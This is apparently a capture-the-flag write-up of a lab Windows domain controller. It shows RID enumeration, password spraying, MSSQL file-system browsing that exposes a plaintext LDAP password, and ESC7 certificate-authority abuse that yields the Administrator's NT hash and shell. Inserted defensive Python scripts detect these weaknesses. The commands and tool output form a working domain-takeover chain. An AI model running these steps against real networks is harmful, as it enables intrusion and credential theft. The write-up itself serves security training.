Target IP: 10.10.11.236

Techniques covered

  • SMB RID brute-forcing
  • Username/password brute-forcing
  • Directory enumeration with xp_dirtree
  • ESC7 privilege escalation

Information gathering

./rustscan -a 10.10.11.236 -u 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Open ports, closed hearts.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.236:53
Open 10.10.11.236:80
Open 10.10.11.236:88
Open 10.10.11.236:135
Open 10.10.11.236:139
Open 10.10.11.236:389
Open 10.10.11.236:445
Open 10.10.11.236:464
Open 10.10.11.236:593
Open 10.10.11.236:636
Open 10.10.11.236:1433
Open 10.10.11.236:3268
Open 10.10.11.236:3269
Open 10.10.11.236:5985
Open 10.10.11.236:9389
Open 10.10.11.236:49667
Open 10.10.11.236:49689
Open 10.10.11.236:49690
Open 10.10.11.236:49693
Open 10.10.11.236:49721
Open 10.10.11.236:49769

HTTP service


It is a static website, and directory scanning turned up nothing, so I set it aside for now.

SMB service

smbclient -L //10.10.11.236
Password for [WORKGROUP\root]:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.236 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

No shares of any value were found.

RID enumeration with netexec

netexec smb 10.10.11.236 -u "test" -p "" --rid-brute --log smb_rid_brute
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [+] manager.htb\test: (Guest)
SMB 10.10.11.236 445 DC01 498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 500: MANAGER\Administrator (SidTypeUser)
SMB 10.10.11.236 445 DC01 501: MANAGER\Guest (SidTypeUser)
SMB 10.10.11.236 445 DC01 502: MANAGER\krbtgt (SidTypeUser)
SMB 10.10.11.236 445 DC01 512: MANAGER\Domain Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 513: MANAGER\Domain Users (SidTypeGroup)
SMB 10.10.11.236 445 DC01 514: MANAGER\Domain Guests (SidTypeGroup)
SMB 10.10.11.236 445 DC01 515: MANAGER\Domain Computers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 516: MANAGER\Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 517: MANAGER\Cert Publishers (SidTypeAlias)
SMB 10.10.11.236 445 DC01 518: MANAGER\Schema Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.236 445 DC01 521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 525: MANAGER\Protected Users (SidTypeGroup)
SMB 10.10.11.236 445 DC01 526: MANAGER\Key Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.236 445 DC01 571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.236 445 DC01 572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.236 445 DC01 1000: MANAGER\DC01$ (SidTypeUser)
SMB 10.10.11.236 445 DC01 1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB 10.10.11.236 445 DC01 1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.236 445 DC01 1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB 10.10.11.236 445 DC01 1113: MANAGER\Zhong (SidTypeUser)
SMB 10.10.11.236 445 DC01 1114: MANAGER\Cheng (SidTypeUser)
SMB 10.10.11.236 445 DC01 1115: MANAGER\Ryan (SidTypeUser)
SMB 10.10.11.236 445 DC01 1116: MANAGER\Raven (SidTypeUser)
SMB 10.10.11.236 445 DC01 1117: MANAGER\JinWoo (SidTypeUser)
SMB 10.10.11.236 445 DC01 1118: MANAGER\ChinHae (SidTypeUser)
SMB 10.10.11.236 445 DC01 1119: MANAGER\Operator (SidTypeUser)

This reveals many usernames, and the output was saved to the smb_rid_brute file (via --log). Extract the usernames from it:

cat smb_rid_brute | grep SidTypeUser | awk -F'\' '{print $2}' | awk -F ' ' '{print $1}'
Administrator
Guest
krbtgt
DC01$
Zhong
Cheng
Ryan
Raven
JinWoo
ChinHae
Operator
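The one-line grep/awk pipeline above works but is brittle (it breaks on group names containing spaces and silently drops the SID type). As an added example that is not part of the original writeup, the parser below reads netexec `--rid-brute` log lines into structured records, separates user accounts from groups, aliases and machine accounts, and also checks for the `(Guest)` authentication line, which is the misconfiguration that lets an arbitrary username with an empty password map to the Guest account and makes this enumeration possible in the first place. The sample log is constructed from a subset of the output shown above.

```python
import re
from collections import namedtuple

# Constructed sample: a subset of the netexec --rid-brute output shown on this page.
SAMPLE_LOG = """\
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [+] manager.htb\\test: (Guest)
SMB 10.10.11.236 445 DC01 500: MANAGER\\Administrator (SidTypeUser)
SMB 10.10.11.236 445 DC01 512: MANAGER\\Domain Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 1000: MANAGER\\DC01$ (SidTypeUser)
SMB 10.10.11.236 445 DC01 1101: MANAGER\\DnsAdmins (SidTypeAlias)
SMB 10.10.11.236 445 DC01 1113: MANAGER\\Zhong (SidTypeUser)
SMB 10.10.11.236 445 DC01 1119: MANAGER\\Operator (SidTypeUser)
"""

Entry = namedtuple("Entry", "rid domain name sid_type")

# One resolved RID looks like "<rid>: <DOMAIN>\<name> (<SidType>)"; the name may contain spaces.
RID_RE = re.compile(r"(\d+):\s+([^\\]+)\\(.+?)\s+\((SidType\w+)\)\s*$")

# netexec prints "[+] <domain>\<user>: (Guest)" when the server mapped the login to Guest.
GUEST_RE = re.compile(r"\[\+\] \S+: \(Guest\)")


def parse_rid_brute(text):
    """Turn every resolved-RID line into an Entry; skip banner and auth lines."""
    entries = []
    for line in text.splitlines():
        m = RID_RE.search(line)
        if m:
            entries.append(Entry(int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return entries


def user_accounts(entries, include_machine=False):
    """Names of SidTypeUser entries; machine accounts (trailing $) are dropped unless asked for."""
    names = []
    for e in entries:
        if e.sid_type != "SidTypeUser":
            continue
        if not include_machine and e.name.endswith("$"):
            continue
        names.append(e.name)
    return names


def custom_accounts(entries):
    """RIDs of 1000 and above were created after domain promotion; well-known objects sit below 1000."""
    return [e for e in entries if e.rid >= 1000]


def guest_session_used(text):
    """True if the log shows the session was downgraded to Guest (null/guest access enabled)."""
    return GUEST_RE.search(text) is not None


if __name__ == "__main__":
    parsed = parse_rid_brute(SAMPLE_LOG)
    print("guest fallback:", guest_session_used(SAMPLE_LOG))
    for name in user_accounts(parsed):
        print(name)
```

From the defender's side the interesting signal is `guest_session_used`: if an unknown account with an empty password is accepted as Guest, RID cycling over SAMR needs no real credentials, and disabling the Guest account (or the "network access: let Everyone permissions apply to anonymous users" style settings) removes that avenue.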

Save the results to user.txt.

Build a simple password wordlist from the usernames:

  • username in all upper case
  • username in all lower case
  • password identical to the username

The command below produces the lower-case variant, which is the one used here:
cat user.txt | awk '{print tolower($0)}' > passwd.txt

Test the combinations with netexec

netexec smb 10.10.11.236 -u user.txt -p passwd.txt --no-bruteforce --continue-on-success
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [-] manager.htb\Administrator:administrator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\Guest:guest STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\krbtgt:krbtgt STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\DC01$:dc01$ STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\Zhong:zhong STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\Cheng:cheng STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\Ryan:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\Raven:raven STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\JinWoo:jinwoo STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\ChinHae:chinhae STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [+] manager.htb\Operator:operator

This yields one valid set of credentials:

username: Operator
password: operator

Continue enumerating with netexec

netexec smb 10.10.11.236 -u Operator -p operator --shares
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [+] manager.htb\Operator:operator
SMB 10.10.11.236 445 DC01 [*] Enumerated shares
SMB 10.10.11.236 445 DC01 Share Permissions Remark
SMB 10.10.11.236 445 DC01 ----- ----------- ------
SMB 10.10.11.236 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.236 445 DC01 C$ Default share
SMB 10.10.11.236 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.236 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.236 445 DC01 SYSVOL READ Logon server share

SMB holds nothing of value, so move on to the other protocols:

netexec winrm 10.10.11.236 -u Operator -p operator
WINRM 10.10.11.236 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
WINRM 10.10.11.236 5985 DC01 [-] manager.htb\Operator:operator

netexec mssql 10.10.11.236 -u Operator -p operator
MSSQL 10.10.11.236 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL 10.10.11.236 1433 DC01 [+] manager.htb\Operator:operator

netexec wmi 10.10.11.236 -u Operator -p operator
RPC 10.10.11.236 135 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
RPC 10.10.11.236 135 DC01 [+] manager.htb\Operator:operator

MSSQL and WMI both accept the credentials, but logging in with impacket-wmiexec fails because of insufficient privileges, so we use MSSQL instead.

impacket-mssqlclient manager.htb/Operator:operator@10.10.11.236 -windows-auth
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (MANAGER\Operator guest@master)>

Note: the -windows-auth parameter is required for the login to succeed.

Attacking MSSQL

  • xp_cmdshell: command execution fails
  • xp_dirtree: a NetNTLM hash was captured, but it could not be cracked to a plaintext password

With those options exhausted, all that is left is to use xp_dirtree to browse the machine's file system.

SQL (MANAGER\Operator  guest@master)> xp_dirtree C:\inetpub\wwwroot
subdirectory depth file
------------------------------- ----- ----
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1

A backup archive turns up under C:\inetpub\wwwroot.

Download it from the website:

wget http://manager.htb/website-backup-27-07-23-old.zip
unzip website-backup-27-07-23-old.zip -d website
cd website

ls -al
total 68
drwxr-xr-x 5 root root 4096 Mar 24 12:18 .
drwxr-xr-x 3 root root 4096 Mar 24 12:18 ..
-rw-r--r-- 1 root root 5386 Jul 27 2023 about.html
-rw-r--r-- 1 root root 5317 Jul 27 2023 contact.html
drwxr-xr-x 2 root root 4096 Mar 24 12:18 css
drwxr-xr-x 2 root root 4096 Mar 24 12:18 images
-rw-r--r-- 1 root root 18203 Jul 27 2023 index.html
drwxr-xr-x 2 root root 4096 Mar 24 12:18 js
-rw-r--r-- 1 root root 698 Jul 27 2023 .old-conf.xml
-rw-r--r-- 1 root root 7900 Jul 27 2023 service.html

The archive contains a hidden .old-conf.xml file:

cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
<access-user>
<user>raven@manager.htb</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>

This gives a second set of credentials:

username: raven
password: R4v3nBe5tD3veloP3r!123
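The root cause here is a backup archive published inside the web root that still carries an old configuration file with a plaintext LDAP bind password. As an added example that is not part of the original writeup, the scanner below walks an extracted web root (or backup), flags hidden dotfiles and leftover archives, and parses XML/.config files for elements whose tag looks like a secret, reporting the value masked. The sample web root it builds is constructed to mirror the listing above; the password value in it is a placeholder, not the one from the page.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Tag names (namespace stripped, lower-cased) that should never hold a plaintext value in a web root.
SECRET_TAGS = {"password", "passwd", "pwd", "secret", "apikey", "api-key", "token"}
ARCHIVE_SUFFIXES = (".zip", ".bak", ".old", ".tar", ".gz", ".7z")

# Constructed sample config in the shape of the .old-conf.xml above, with a placeholder password.
SAMPLE_CONF = """<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <server>
    <host>dc01.manager.htb</host>
    <access-user>
      <user>raven@manager.htb</user>
      <password>ExamplePassw0rd!123</password>
    </access-user>
  </server>
</ldap-conf>
"""


def mask(value):
    """Keep only the first and last two characters so a report never re-leaks the secret."""
    if len(value) <= 4:
        return "*" * len(value)
    return value[:2] + "*" * (len(value) - 4) + value[-2:]


def scan_xml_for_secrets(path):
    """Return (tag, masked value) for every element whose tag is in SECRET_TAGS."""
    findings = []
    try:
        root = ET.parse(path).getroot()
    except ET.ParseError:
        return findings  # not well-formed XML: nothing to report from this parser
    for elem in root.iter():
        tag = elem.tag.split("}")[-1].lower()  # drop any {namespace} prefix
        if tag in SECRET_TAGS and elem.text and elem.text.strip():
            findings.append((tag, mask(elem.text.strip())))
    return findings


def scan_webroot(directory):
    """List files that should not be served: dotfiles, leftover archives, configs with secrets."""
    report = []
    for dirpath, _, files in os.walk(directory):
        for name in files:
            full = os.path.join(dirpath, name)
            lower = name.lower()
            hidden = name.startswith(".")
            archive = lower.endswith(ARCHIVE_SUFFIXES)
            secrets = scan_xml_for_secrets(full) if lower.endswith((".xml", ".config")) else []
            if hidden or archive or secrets:
                report.append({
                    "file": os.path.relpath(full, directory),
                    "hidden": hidden,
                    "archive": archive,
                    "secrets": secrets,
                })
    return report


def build_sample_webroot():
    """Create a throwaway directory mirroring the extracted backup listed above (constructed)."""
    d = tempfile.mkdtemp(prefix="webroot-")
    for name in ("index.html", "about.html"):
        with open(os.path.join(d, name), "w") as fh:
            fh.write("<html></html>")
    with open(os.path.join(d, "web.config"), "w") as fh:
        fh.write("<configuration/>")  # XML with no secret elements: must not be flagged
    with open(os.path.join(d, ".old-conf.xml"), "w") as fh:
        fh.write(SAMPLE_CONF)
    with open(os.path.join(d, "website-backup-27-07-23-old.zip"), "wb") as fh:
        fh.write(b"PK")  # only the name matters for this check
    return d


if __name__ == "__main__":
    for entry in scan_webroot(build_sample_webroot()):
        print(entry)
```

Run against a deployment directory or an extracted backup before it is published; anything the report lists is a candidate for removal from the web root, and a hit on a secret tag means the credential itself should be rotated, since a backup that reached the web root may already have been downloaded.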

Check them with netexec

netexec winrm 10.10.11.236 -u 'raven' -p 'R4v3nBe5tD3veloP3r!123'
WINRM 10.10.11.236 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
WINRM 10.10.11.236 5985 DC01 [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123 (Pwn3d!)

Log in with evil-winrm

evil-winrm -i 10.10.11.236 -u 'raven' -p 'R4v3nBe5tD3veloP3r!123'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents> whoami
manager\raven

Login succeeds, and user.txt is on the Desktop.

ESC7 privilege escalation

netexec ldap 10.10.11.236 -u Operator -p operator -M adcs
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.236 389 DC01 [+] manager.htb\Operator:operator
ADCS 10.10.11.236 389 DC01 [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.10.11.236 389 DC01 Found PKI Enrollment Server: dc01.manager.htb
ADCS 10.10.11.236 389 DC01 Found CN: manager-DC01-CA

netexec ldap 10.10.11.236 -u 'raven' -p 'R4v3nBe5tD3veloP3r!123' -M adcs
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.236 389 DC01 [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123
ADCS 10.10.11.236 389 DC01 [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.10.11.236 389 DC01 Found PKI Enrollment Server: dc01.manager.htb
ADCS 10.10.11.236 389 DC01 Found CN: manager-DC01-CA

Both accounts are domain users, and the domain has an ADCS enrollment server (manager-DC01-CA on dc01.manager.htb).

Use certipy-ad to look for an exploitable misconfiguration:

certipy-ad find -u 'raven' -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates

Raven holds the ManageCa right on the CA, so ESC7 can be used to escalate privileges.

Reference: https://www.thehacker.recipes/ad/movement/adcs/access-controls#esc7-abusing-subca
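The Certipy finding above boils down to an ACL check on the CA object: any principal outside the PKI/domain administrator set that holds ManageCa (CA administrator) or ManageCertificates (certificate manager) is an ESC7 condition. As an added example that is not part of the original writeup or of Certipy, the code below parses the "Access Rights" block of a `certipy find` report and returns exactly those principals, so the same check can be run in a review script or against saved scan output. The sample report is constructed from the page's output with Certipy's usual indentation; the allowlist of privileged groups is an assumption and should be adjusted to the organisation's PKI admin groups.

```python
# Constructed sample in the layout of the Certipy 'find' output above (same principals as the page).
SAMPLE_FIND = """\
Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Web Enrollment                      : Disabled
    Permissions
      Owner                             : MANAGER.HTB\\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\\Operator
                                          MANAGER.HTB\\Authenticated Users
                                          MANAGER.HTB\\Raven
        ManageCertificates              : MANAGER.HTB\\Administrators
                                          MANAGER.HTB\\Domain Admins
                                          MANAGER.HTB\\Enterprise Admins
        ManageCa                        : MANAGER.HTB\\Administrators
                                          MANAGER.HTB\\Domain Admins
                                          MANAGER.HTB\\Enterprise Admins
                                          MANAGER.HTB\\Raven
[!] Vulnerabilities
"""

# Assumed allowlist: groups that are expected to administer the CA. Adjust per environment.
PRIVILEGED = {"administrators", "domain admins", "enterprise admins"}

# The two CA-level rights whose holders can approve or issue arbitrary requests (ESC7).
DANGEROUS_RIGHTS = ("ManageCa", "ManageCertificates")


def parse_access_rights(text):
    """Map each right under 'Access Rights' to the list of principals holding it.

    A line containing ' : ' starts a new right; following lines without it are
    additional principals for the same right. The block ends at a blank line
    or at the '[!]' marker that precedes the vulnerability summary.
    """
    rights = {}
    current = None
    in_block = False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Access Rights":
            in_block = True
            continue
        if not in_block:
            continue
        if not line or line.startswith("[!]"):
            break
        if " : " in line:
            right, principal = (part.strip() for part in line.split(" : ", 1))
            current = right
            rights.setdefault(current, []).append(principal)
        elif current is not None:
            rights[current].append(line)
    return rights


def account_name(principal):
    """'MANAGER.HTB\\Raven' -> 'raven' (domain prefix dropped, case-folded)."""
    return principal.split("\\", 1)[-1].lower()


def esc7_findings(rights):
    """(right, principal) pairs where a non-privileged principal holds a dangerous CA right."""
    findings = []
    for right in DANGEROUS_RIGHTS:
        for principal in rights.get(right, []):
            if account_name(principal) not in PRIVILEGED:
                findings.append((right, principal))
    return findings


if __name__ == "__main__":
    for right, principal in esc7_findings(parse_access_rights(SAMPLE_FIND)):
        print(f"ESC7: {principal} holds {right}")
```

Remediation is the inverse of the attack chain that follows: remove ManageCa/ManageCertificates from any account that is not a designated PKI administrator (in the Certification Authority MMC, CA properties, Security tab), and audit the CA's issued-certificate log for requests that were denied by template permissions and later issued manually, which is the trace this technique leaves behind.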

Step 1: use the ManageCa right to grant ourselves the ManageCertificates right (the -add-officer parameter)

certipy-ad ca -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -add-officer raven
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Raven' on 'manager-DC01-CA'

Step 2: request a certificate from the SubCA template with Administrator as the SAN (UPN)

certipy-ad req -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -dc-ip 10.10.11.236 -template SubCA -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 23
Would you like to save the private key? (y/N) y
[*] Saved private key to 23.key
[-] Failed to request certificate

Note the Request ID and keep the private key (answer y).

Step 3: use the ManageCertificates right to issue the request that was just denied

certipy-ad ca -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -dc-ip 10.10.11.236 -issue-request 23
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate

Step 4: retrieve the issued certificate using the request ID and the saved private key

certipy-ad req -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -retrieve 23
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Rerieving certificate with ID 23
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Loaded private key from '23.key'
[*] Saved certificate and private key to 'administrator.pfx'

Step 5: authenticate with the certificate to obtain the Administrator account's NT hash

First synchronise the clock with the DC (Kerberos rejects requests with too much clock skew):

ntpdate -s manager.htb

Then continue:

certipy-ad auth -pfx administrator.pfx -username Administrator -domain manager.htb -dc-ip 10.10.11.236
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef

Verify the hash with netexec

netexec winrm 10.10.11.236 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
WINRM 10.10.11.236 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
WINRM 10.10.11.236 5985 DC01 [+] manager.htb\Administrator:ae5064c2f62317332c88629e025924ef (Pwn3d!)

Log in with evil-winrm

evil-winrm -i 10.10.11.236 -u Administrator -H ae5064c2f62317332c88629e025924ef

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
manager\administrator

Login succeeds, and root.txt is on the Desktop.